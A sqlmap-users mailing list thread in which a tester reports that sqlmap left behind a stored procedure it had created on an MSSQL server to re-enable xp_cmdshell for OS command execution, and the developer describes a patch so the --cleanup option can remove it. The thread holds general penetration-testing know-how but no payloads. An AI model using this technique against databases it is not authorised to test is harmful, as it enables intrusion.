>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] cleaning up after yourself

[Miroslav S. <mir...@gm...>]

Hi.

Just made a patch. Not around a testing environment to test it out, but now
it should work (new proc name is not randomly generated from now on so it
could be properly deleted afterwards).

Bye

On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Will check this out in an hour or so. At first glance I can see that we
> have to make a patch for MsSQL.
>
> Bye
>
> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>
>> Looking at the commands sent I can see three drop tables for
>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>> procedures.
>>
>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>> > Just spotted --cleanup but that didn't remove the procedure, sqlmap
>> > command seemed to run OK though but didn't say anything about what it
>> > was removing, should it have done?
>> >
>> > Robin
>> >
>> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>> >> I'm testing sqlmap against an MSSQL DB and looking at running OS
>> >> commands. In an attempt to reenable xp_cmdshell a stored proc called
>> >> xp_gedp has been created and left behind, is there any way to
>> >> automatically clean up this and any other things that are created?
>> >>
>> >> Robin
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm